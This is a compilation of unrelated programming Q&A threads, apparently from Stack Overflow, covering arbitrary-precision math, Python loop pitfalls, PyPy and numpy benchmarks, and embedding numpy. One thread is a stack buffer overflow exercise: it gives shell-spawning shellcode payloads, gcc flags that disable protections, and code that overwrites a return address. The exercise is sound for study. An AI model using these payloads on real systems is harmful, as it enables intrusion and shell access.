I'm wondering if anyone knows of any libraries that allow for very high precision (200+ significant figures, preferably arbitrary) incomplete gamma functions? So far the only thing I've found is mpmath for Python, but I have no idea how I would incorporate that into C code, if that is even possible.
It could be in any language, just so long as I can somehow link it and call it from C.
Cheers
I think the GNU MP Bignum library is exactly what you're looking for.
You can do things like:
#include <stdio.h>
#include <gmp.h>
int main(int argc, char *argv[]) {
    mpz_t a, b, c;

    if (argc < 3) {
        printf("Please supply two numbers to add.\n");
        return 1;
    }

    mpz_init_set_str(a, argv[1], 10);
    mpz_init_set_str(b, argv[2], 10);
    mpz_init(c);                      /* c must be initialized before mpz_add uses it */
    mpz_add(c, a, b);

    printf("%s + %s => %s\n", argv[1], argv[2], mpz_get_str(NULL, 10, c));
    return 0;
}
Compile with: gcc -o add_example add_example.c -lgmp -lm
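For example, running the compiled program with two 30-digit inputs gives the exact sum (the output line follows the printf format above):

    $ ./add_example 123456789012345678901234567890 987654321098765432109876543210
    123456789012345678901234567890 + 987654321098765432109876543210 => 1111111110111111111011111111100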
As an alternative route, you could use a mathematical application that supports running in batch mode, such as Maxima, Mathematica or Matlab.
I tried the following Maxima script:
fpprec : 200;
fpprintprec : 200;
bfloat(gamma_incomplete(2,bfloat(2.3)));
Running it like this: maxima -q -b ./incompletegamma.mc run gives:
(%i1) batch("./gamma.mc")
read and interpret file: ./gamma.mc
(%i2) fpprec:200
(%o2) 200
(%i3) fpprintprec:1000
(%o3) 1000
(%i4) bfloat(gamma_incomplete(2,bfloat(2.3)))
(%o4) 3.3085418428525236227076532372691440857133290256546276037973522730841281\
226873248876116604879039570340226922621099906787322361219389317316508680513479\
116358485422369818232009561056364657588558639170139b-1
You can use system() or subprocess.call() to run the Maxima script from a Python application like this:
from subprocess import call
call(["maxima", "-q", "-b", "./incompletegamma.mc"])
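Since the original question asks for something callable from C, here is a minimal, untested sketch of the same idea using popen(). It assumes maxima is on the PATH and that ./incompletegamma.mc is the script shown above; it simply echoes whatever Maxima prints, so you could parse out the (%o...) result line yourself:

    #define _POSIX_C_SOURCE 200809L   /* for popen()/pclose() declarations */
    #include <stdio.h>

    int main(void) {
        char line[512];
        /* assumes "maxima" is on the PATH and ./incompletegamma.mc is the script above */
        FILE *p = popen("maxima -q -b ./incompletegamma.mc", "r");

        if (p == NULL) {
            perror("popen");
            return 1;
        }
        while (fgets(line, sizeof line, p) != NULL) {
            fputs(line, stdout);   /* parse out the (%o...) result line here if needed */
        }
        pclose(p);
        return 0;
    }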
My C++ code works as expected, but the equivalent Python code hangs in an infinite loop. Help!
C++
#include <iostream>
using namespace std;
int main()
{
    for (int i = 0; i < 4; ++i) {
        int j = 0;
        while (i != j) {
            ++j;
            cout << j << endl;
        }
    }
}
Python
for i in range(4):
    j = 0
    while i != j:
        ++j
        print(j)
++j is not a thing in Python. You want j += 1.
In order to avoid ambiguity and confusion, Python's Benevolent Dictator For Life chose not to allow ++ or -- operators into the language. That means you are in an infinite loop, because ++j does not do what you believe it does: it parses as +(+j), a unary plus applied twice, which leaves j unchanged.
So I have a really simple stack overflow:
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]) {
    char buf[256];
    memcpy(buf, argv[1], strlen(argv[1]));
    printf(buf);
}
I'm trying to overflow with this code:
$(python -c "print '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*237 + 'c8f4ffbf'.decode('hex')")
When I overflow the stack, I successfully overwrite EIP with my wanted address but then nothing happens. It doesn't execute my shellcode.
Does anyone see the problem? Note: My python may be wrong.
UPDATE
What I don't understand is why my code is not executing. For instance if I point eip to nops, the nops never get executed. Like so,
$(python -c "print '\x90'*50 + 'A'*210 + '\xc8\xf4\xff\xbf'")
UPDATE
Could someone be kind enough to exploit this overflow themselves on Linux x86 and post the results?
UPDATE
Never mind y'all, I got it working. Thanks for all your help.
UPDATE
Well, I thought I did. I did get a shell, but now I'm trying again and I'm having problems.
All I'm doing is overflowing the stack at the beginning and pointing my shellcode there.
Like so,
r $(python -c 'print "A"*260 + "\xcc\xf5\xff\xbf"')
This should point to the A's. Now what I don't understand is why my address at the end gets changed in gdb.
This is what gdb gives me,
Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff5cd in ?? ()
The \xcc gets changed to \xcd. Could this have something to do with the error I get with gdb?
When I fill that address with "B"'s for instance it resolves fine with \x42\x42\x42\x42. So what gives?
Any help would be appreciated.
Also, I'm compiling with the following options:
gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o so so.c
It's really odd because any other address works except the one I need.
UPDATE
I can successfully spawn a shell with the following in gdb,
$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
But I don't understand why this works sometimes and doesn't work other times. Sometimes my overwritten eip is changed by gdb. Does anyone know what I am missing? Also, I can only spawn a shell in gdb and not in the normal process. And on top of that, I can only seem to start a shell once in gdb, and then gdb stops working.
For instance, now when I run the following I get this in gdb...
Starting program: /root/so $(python -c 'print "A"*260 + "\xc8\xf4\xff\xbf"')
Program received signal SIGSEGV, Segmentation fault.
0xbffff5cc in ?? ()
This seems to be caused by execstack being turned on.
UPDATE
Yeah, for some reason I'm getting different results but the exploit is working now. So thank you everyone for your help. If anyone can explain the results I received above, I'm all ears. Thanks.
There are several protections against this kind of attack that come straight from the compiler. For example, your stack may not be executable.
readelf -l <filename>
if your output contains something like this:
GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4
this means that you can only read and write on the stack (so you would need a "return to libc" style attack to spawn your shell).
Also there could be canary protection, meaning there is a part of memory between your variables and the instruction pointer that contains a value which is checked for integrity; if it is overwritten by your string, the program will exit.
If you are trying this on your own program, consider removing some of the protections with gcc options:
gcc -z execstack
Also, a note on your assembly: you usually include NOPs before your shellcode, so you don't have to target the exact address where your shellcode starts.
$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
Note that in the address that gets placed into the instruction pointer, you can modify the last hex digits to point somewhere inside your NOPs rather than exactly at the beginning of your buffer.
Of course gdb should become your best friend if you are trying something
like that.
Hope this helps.
This isn't going to work too well [as written]. However, it is possible, so read on ...
It helps to know what the actual stack layout is when the main function is called. It's a bit more complicated than most people realize.
Assuming a POSIX OS (e.g. linux), the kernel will set the stack pointer at a fixed address.
The kernel does the following:
It calculates how much space is needed for the environment variable strings (i.e. strlen("HOME=/home/me") + 1 for each environment variable) and "pushes" these strings onto the stack in a downward [towards lower memory] direction. It then counts how many there were (e.g. envcount), creates a char *envp[envcount + 1] on the stack, fills in the envp values with pointers to the given strings, and NULL-terminates envp.
A similar process is done for the argv strings.
Then, the kernel loads the ELF interpreter. The kernel starts the process with the starting address of the ELF interpreter. The ELF interpreter [eventually] invokes the "start" function (e.g. _start from crt0.o) which does some init and then calls main(argc,argv,envp)
This is [sort of] what the stack looks like when main gets called:
"HOME=/home/me"
"LOGNAME=me"
"SHELL=/bin/sh"
// alignment pad ...
char *envp[4] = {
// address of "HOME" string
// address of "LOGNAME" string
// address of "SHELL" string
NULL
};
// string for argv[0] ...
// string for argv[1] ...
// ...
char *argv[] = {
// pointer to argument string 0
// pointer to argument string 1
// pointer to argument string 2
NULL
}
// possibly more stuff put in by ELF interpreter ...
// possibly more stuff put in by _start function ...
On an x86, the argc, argv, and envp pointer values are put into the first three argument registers of the x86 ABI.
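If you want to see this layout on your own machine, here is a small illustrative sketch (not part of the exploit): it uses the common three-argument form of main on Linux/GCC and prints where the argv and envp strings ended up. With ASLR enabled the numbers change from run to run, which is part of the problem described next.

    #include <stdio.h>

    int main(int argc, char **argv, char **envp) {
        /* argv and envp strings sit near the top of the stack, close together */
        printf("argv[0] string at %p: %s\n", (void *) argv[0], argv[0]);
        if (envp[0] != NULL)
            printf("envp[0] string at %p: %s\n", (void *) envp[0], envp[0]);
        printf("&argv[0] (the pointer array) at %p\n", (void *) &argv[0]);
        return 0;
    }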
Here's the problem [problems, plural, actually] ...
By the time all this is done, you have little to no idea what the address of the shellcode is. So, any code you write must use RIP-relative addressing and [probably] be built with -fPIC.
And, the resultant code can't have a zero byte in the middle, because it is being conveyed [by the kernel] as a NUL (EOS) terminated string. So, a string that has a zero (e.g. <byte0>,<byte1>,<byte2>,0x00,<byte5>,<byte6>,...) would only transfer the first three bytes and not the entire shellcode program.
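A tiny illustration of that truncation (the byte values here are arbitrary, not real shellcode): the zero byte ends the string, so anything bounded by strlen, like the memcpy(buf, argv[1], strlen(argv[1])) in the program being attacked, never sees the bytes after it:

    #include <stdio.h>
    #include <string.h>

    int main(void) {
        /* arbitrary example bytes (not real shellcode) with an embedded zero byte */
        char payload[] = "\x31\xc0\x00\x50\x68";

        /* prints 2, not 5: nothing after the zero byte would ever be copied */
        printf("bytes before the first NUL: %zu\n", strlen(payload));
        return 0;
    }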
Nor do you have a good idea as to what the stack pointer value is.
Also, you need to find the memory word on the stack that has the return address in it (i.e. this is what the start function's call main asm instruction pushes).
This word containing the return address must be set to the address of the shell code. But, it doesn't always have a fixed offset relative to a main stack frame variable (e.g. buf). So, you can't predict what word on the stack to modify to get the "return to shellcode" effect.
Also, on x86 architectures, there is special mitigation hardware. For example, a page can be marked NX [no execute]. This is usually done for certain segments, such as the stack. If the RIP is changed to point to the stack, the hardware will fault out.
Here's the [easy] solution ...
gcc has some intrinsic functions that can help: __builtin_return_address, __builtin_frame_address.
So, get the value of the real return address from the intrinsic [call this retadr]. Get the address of the stack frame [call this fp].
Starting from fp and incrementing (by sizeof(void*)) toward higher memory, find a word that matches retadr. This memory location is the one you want to modify to point to the shellcode. It will probably be at offset 0 or 8.
So, then do: *fp = argv[1] and return.
Note, extra steps may be necessary because if the stack has the NX bit set, the string pointed to by argv[1] is on the stack as mentioned above.
Here is some example code that works:
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
void
shellcode(void)
{
    static char buf[] = "shellcode: hello\n";
    char *cp;

    for (cp = buf; *cp != 0; ++cp);

    // NOTE: in real shell code, we couldn't rely on using this function, so
    // these would need to be the CPP macro versions: _syscall3 and _syscall2
    // respectively or the syscall function would need to be _statically_
    // linked in
    syscall(SYS_write, 1, buf, cp - buf);
    syscall(SYS_exit, 0);
}

int
main(int argc, char **argv)
{
    void *retadr = __builtin_return_address(0);
    void **fp = __builtin_frame_address(0);
    int iter;

    printf("retadr=%p\n", retadr);
    printf("fp=%p\n", fp);

    // NOTE: for your example, replace:
    //   *fp = (void *) shellcode;
    // with:
    //   *fp = (void *) argv[1]
    for (iter = 20; iter > 0; --iter, fp += 1) {
        printf("fp=%p %p\n", fp, *fp);
        if (*fp == retadr) {
            *fp = (void *) shellcode;
            break;
        }
    }

    if (iter <= 0)
        printf("main: no match\n");

    return 0;
}
I was having similar problems when trying to perform a stack buffer overflow. I found that my return address in GDB was different than that in a normal process. What I did was add the following:
unsigned long printesp(void) {
    __asm__("movl %esp,%eax");   /* on a 32-bit build the caller takes the return value from %eax */
}
And called it at the end of main, right before the return, to get an idea of where the stack was. From there I just played with that value, subtracting 4 from the printed ESP until it worked.
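For reference, a minimal sketch of how such a helper might sit in the target program (this assumes a 32-bit build, where the value left in %eax by the asm becomes the function's return value):

    #include <stdio.h>

    unsigned long printesp(void) {
        __asm__("movl %esp,%eax");            /* value left in %eax becomes the return value */
    }

    int main(int argc, char *argv[]) {
        /* ... the vulnerable code would go here ... */
        printf("esp = 0x%lx\n", printesp());  /* call right before returning */
        return 0;
    }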
I'm looking into replacing some C code with Python code and using PyPy as the interpreter. The code does a lot of list/dictionary operations. Therefore, to get a vague idea of the performance of PyPy vs C, I am writing sorting algorithms. To test all my read functions I wrote a bubble sort, both in Python and C++. CPython of course sucks: 6.468s; PyPy came in at 0.366s and C++ at 0.229s. Then I remembered that I had forgotten -O3 on the C++ code, and the time went to 0.042s. For a 32768 dataset, C++ with -O3 is only 2.588s and PyPy is 19.65s. Is there anything I can do to speed up my Python code (besides using a better sort algorithm, of course), or something about how I use PyPy (some flag or something)?
Python code (read_nums module omitted since its time is trivial: 0.036s on the 32768 dataset):
import read_nums
import sys
nums = read_nums.read_nums(sys.argv[1])
done = False
while not done:
    done = True
    for i in range(len(nums)-1):
        if nums[i] > nums[i+1]:
            nums[i], nums[i+1] = nums[i+1], nums[i]
            done = False
$ time pypy-c2.0 bubble_sort.py test_32768_1.nums
real 0m20.199s
user 0m20.189s
sys 0m0.009s
C++ code (read_nums function again omitted since it takes little time: 0.017s):
#include <iostream>
#include "read_nums.h"
int main(int argc, char** argv)
{
    std::vector<int> nums;
    int count, i, tmp;
    bool done;

    if(argc < 2)
    {
        std::cout << "Usage: " << argv[0] << " filename" << std::endl;
        return 1;
    }
    count = read_nums(argv[1], nums);
    done = false;
    while(!done)
    {
        done = true;
        for(i=0; i<count-1; ++i)
        {
            if(nums[i] > nums[i+1])
            {
                tmp = nums[i];
                nums[i] = nums[i+1];
                nums[i+1] = tmp;
                done = false;
            }
        }
    }
    for(i=0; i<count; ++i)
    {
        std::cout << nums[i] << ", ";
    }
    return 0;
}
$ time ./bubble_sort test_32768_1.nums > /dev/null
real 0m2.587s
user 0m2.586s
sys 0m0.001s
P.S. Some of the numbers given in the first paragraph are a little different than the numbers from time because they're the numbers I got the first time.
Further improvements:
Just tried xrange instead of range and the run time went to 16.370s.
Moved the code starting from the first done = False through the last done = False into a function; speed is now 8.771-8.834s.
The most relevant way to answer this question is to note that the speed of C, CPython and PyPy are not differing by a constant factor: it depends most importantly on what is done and the way it is written. For example, if your C code is doing naive things like walking arrays when the "equivalent" Python code would naturally use dictionaries, then any implementation of Python is faster than C provided the arrays are long enough. Of course, this is not the case on most real-life examples, but the same argument still applies to a smaller extent. There is no one-size-fits-all way to predict the relative speed of a program written in C, or rewritten in Python and running on CPython or PyPy.
Obviously there are guidelines about these relative speeds: on small algorithmical examples you could expect the speed of PyPy to be approaching that of "gcc -O0". In your example it is "only" 1.6x slower. We might help you optimize it, or even find optimizations missing in PyPy, in order to gain 10% or 30% more speed. But this is a tiny example that has nothing to do with your real program. For the reasons above the speed we get here is only vaguely related to the speed you'll get in the end.
I can only say that rewriting code from C to Python for reasons of clarity, notably when the C has become too tangled up for further developments, is clearly a win in the long run --- even in the case where at the end you need to rewrite some parts of it in C again. And PyPy's goal here is to reduce the need for that. While it would be nice to say that no-one ever needs C any more, it's just not true :-)
I have pretty much the same code in python and C. Python example:
import numpy
nbr_values = 8192
n_iter = 100000
a = numpy.ones(nbr_values).astype(numpy.float32)
for i in range(n_iter):
    a = numpy.sin(a)
C example:
#include <stdio.h>
#include <math.h>
int main(void)
{
    int i, j;
    int nbr_values = 8192;
    int n_iter = 100000;
    double x;

    for (j = 0; j < nbr_values; j++){
        x = 1;
        for (i = 0; i < n_iter; i++)
            x = sin(x);
    }
    return 0;
}
Something strange happened when I ran both examples:
$ time python numpy_test.py
real 0m5.967s
user 0m5.932s
sys 0m0.012s
$ g++ sin.c
$ time ./a.out
real 0m13.371s
user 0m13.301s
sys 0m0.008s
It looks like Python/numpy is twice as fast as C. Is there any mistake in the experiment above? How can you explain it?
P.S. I have Ubuntu 12.04, 8G ram, core i5 btw
First, turn on optimization. Secondly, subtleties matter. Your C code is definitely not 'basically the same'.
Here is equivalent C code:
sinary2.c:
#include <math.h>
#include <stdlib.h>
float *sin_array(const float *input, size_t elements)
{
    int i = 0;
    float *output = malloc(sizeof(float) * elements);

    for (i = 0; i < elements; ++i) {
        output[i] = sin(input[i]);
    }
    return output;
}
sinary.c:
#include <math.h>
#include <stdlib.h>
extern float *sin_array(const float *input, size_t elements);

int main(void)
{
    int i;
    int nbr_values = 8192;
    int n_iter = 100000;
    float *x = malloc(sizeof(float) * nbr_values);

    for (i = 0; i < nbr_values; ++i) {
        x[i] = 1;
    }
    for (i = 0; i < n_iter; i++) {
        float *newary = sin_array(x, nbr_values);
        free(x);
        x = newary;
    }
    return 0;
}
Results:
$ time python foo.py
real 0m5.986s
user 0m5.783s
sys 0m0.050s
$ gcc -O3 -ffast-math sinary.c sinary2.c -lm
$ time ./a.out
real 0m5.204s
user 0m4.995s
sys 0m0.208s
The reason the program has to be split in two is to fool the optimizer a bit. Otherwise it will realize that the whole loop has no effect at all and optimize it out. Putting things in two files doesn't give the compiler visibility into the possible side-effects of sin_array when it's compiling main and so it has to assume that it actually has some and repeatedly call it.
Your original program is not at all equivalent for several reasons. One is that you have nested loops in the C version and you don't in Python. Another is that you are working with arrays of values in the Python version and not in the C version. Another is that you are creating and discarding arrays in the Python version and not in the C version. And lastly you are using float in the Python version and double in the C version.
Simply calling the sin function the appropriate number of times does not make for an equivalent test.
Also, the optimizer is a really big deal for C. Comparing C code on which the optimizer hasn't been used to anything else when you're wondering about a speed comparison is the wrong thing to do. Of course, you also need to be mindful. The C optimizer is very sophisticated and if you're testing something that really doesn't do anything, the C optimizer might well notice this fact and simply not do anything at all, resulting in a program that's ridiculously fast.
Because "numpy" is a dedicated math library implemented for speed. C has standard functions for sin/cos that are generally designed for accuracy.
You are also not comparing apples with apples, as you are using double in C and float32 (float) in Python. If we change the Python code to calculate in float64 instead, the time increases by about 2.5 seconds on my machine, making it roughly match the correctly optimized C version.
If the whole test was made to do something more complicated that requires more control structres (if/else, do/while, etc), then you would probably see even less difference between C and Python - because the C compiler can't really do "sin" any faster - unless you implement a better "sin" function.
Never mind the fact that your code isn't quite the same on both sides... ;)
You seem to be doing the same operation in C 8192 x 10000 times but only 10000 in Python (I haven't used numpy before so I may misunderstand the code). Why are you using an array in the Python case (again, I'm not used to numpy, so perhaps the dereferencing is implicit)? If you wish to use an array, be careful: doubles have a performance hit in terms of caching and optimised vectorisation. You're using different types between the two implementations (float vs double), but given the algorithm I don't think it matters.
The main reason for a lot of anomalous performance benchmark results surrounding C vs Py-this, Py-that... is simply that the C implementation is often poor.
https://www.ibm.com/developerworks/community/blogs/jfp/entry/A_Comparison_Of_C_Julia_Python_Numba_Cython_Scipy_and_BLAS_on_LU_Factorization?lang=en
If you notice, the guy writes C to process an array of doubles (without using the restrict or const keywords where he could have), builds with optimisation, and then forces the compiler to use SIMD rather than AVX. In short, the compiler is using an inefficient instruction set for doubles, and the wrong type of registers too, if he wanted performance. You can be sure numba and numpy will be using as many bells and whistles as possible, and will be shipped with very efficient C and C++ libraries to begin with. In short, if you want speed with C you have to think about it; you may even have to disassemble the code, and perhaps disable optimisation and use compiler intrinsics instead. C gives you the tools to do it, so don't expect the compiler to do all the work for you. If you want that degree of freedom, use Cython, Numba, Numpy, Scipy etc. They're very fast, but you won't be able to eke out every bit of performance from the machine; to do that, use C, C++ or new versions of FORTRAN.
Here is a very good article on these very points (I'd use SciPy):
https://www.scipy.org/scipylib/faq.html
I am trying to embed Python 2.7.3 in C++ and use the Numpy library, and I get a runtime error while importing Numpy for the second time. Here is a simple code example (as small as possible):
#include <Python.h>
int main() {
    for (int i = 0; i < 2; i++) {
        Py_Initialize();
        PyImport_ImportModule("numpy");
        Py_Finalize();
    }
    return 0;
}
What's wrong with this ?
From the Py_Finalize documentation you have:
Some extensions may not work properly if their initialization routine is called more than
once; this can happen if an application calls Py_Initialize() and
Py_Finalize() more than once.
I wouldn't be surprised if Numpy is one of these extensions.
Update: looks like it is, see this question.
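Given that limitation, one common workaround (a sketch based on the quoted docs, not a numpy-specific guarantee) is to initialize the interpreter once, keep it alive for the lifetime of the program, and finalize only at the very end, so numpy's initialization routine runs a single time:

    #include <Python.h>

    int main() {
        Py_Initialize();                      /* initialize the interpreter once */
        for (int i = 0; i < 2; i++) {
            /* repeated imports are cheap: Python returns the cached module */
            PyImport_ImportModule("numpy");
        }
        Py_Finalize();                        /* finalize once, at the very end */
        return 0;
    }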